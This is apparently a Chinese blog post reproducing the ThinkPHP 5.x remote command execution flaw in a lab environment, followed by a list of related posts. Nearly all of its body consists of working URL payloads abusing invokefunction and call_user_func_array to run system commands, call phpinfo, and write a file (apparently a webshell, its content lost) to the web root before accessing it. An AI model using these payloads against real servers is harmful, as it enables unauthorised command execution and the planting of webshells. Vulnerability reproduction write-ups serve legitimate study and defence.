Thinkphp5x远程命令执⾏及getshell

2301_815255182024-09-24 12:11

启动环境查看端口

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=id ![](https://i-blog.csdnimg.cn/direct/71c2408fcf614719986569264e20893f.png) ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/3035c9bc75d545d387ac0b0359d85963.png) ? s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1

\]=echo "\" \>\>1.php ![](https://i-blog.csdnimg.cn/direct/10d4fe0c722944ceaa489763ceab5209.png) 访问1.php ![](https://i-blog.csdnimg.cn/direct/fc7472516e4840998cb786e1cf50fc8a.png)

相关推荐
BenSmith2 小时前
CVE-2025-6554漏洞复现
安全
BenSmith2 小时前
CVE-2018-17463复现
安全
lsec2 小时前
内存加载带有TLS的DLL的问题分析
windows·安全
m0_694845574 小时前
服务器如何配置防火墙规则开放/关闭端口?
linux·服务器·安全·云计算
柴郡猫^O^7 小时前
OSCP - Proving Grounds - DC - 1
安全·网络安全·安全性测试
泡泡以安7 小时前
JA3指纹在Web服务器或WAF中集成方案
服务器·安全·https·ja3指纹
Raners_8 小时前
【Linux】文件权限以及特殊权限(SUID、SGID)
linux·安全
格调UI成品10 小时前
预警系统安全体系构建:数据加密、权限分级与误报过滤方案
大数据·运维·网络·数据库·安全·预警
Wallace Zhang12 小时前
STM32F103_Bootloader程序开发11 - 实现 App 安全跳转至 Bootloader
stm32·嵌入式硬件·安全
CertiK13 小时前
IBW 2025: CertiK首席商务官出席,探讨AI与Web3融合带来的安全挑战
人工智能·安全·web3
热门推荐
01手机电脑之间快速传输图片视频文件,不压缩画质、不限制大小的方法!02如何将markdown生成pdf03Coze扣子平台完整体验和实践(附国内和国际版对比)04Coze实战第13讲:飞书多维表格读取+豆包生图模型,轻松批量生成短剧封面05鸽了六年的某大厂面试题:你会手写一个模板引擎吗?06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07Word粘贴时出现“运行时错误53,文件未找到:MathPage.WLL“的解决方案08《C#图解教程 第5版》深度推荐09DeepSeek各版本说明与优缺点分析10C#调用WechatOCR.exe实现本地OCR文字识别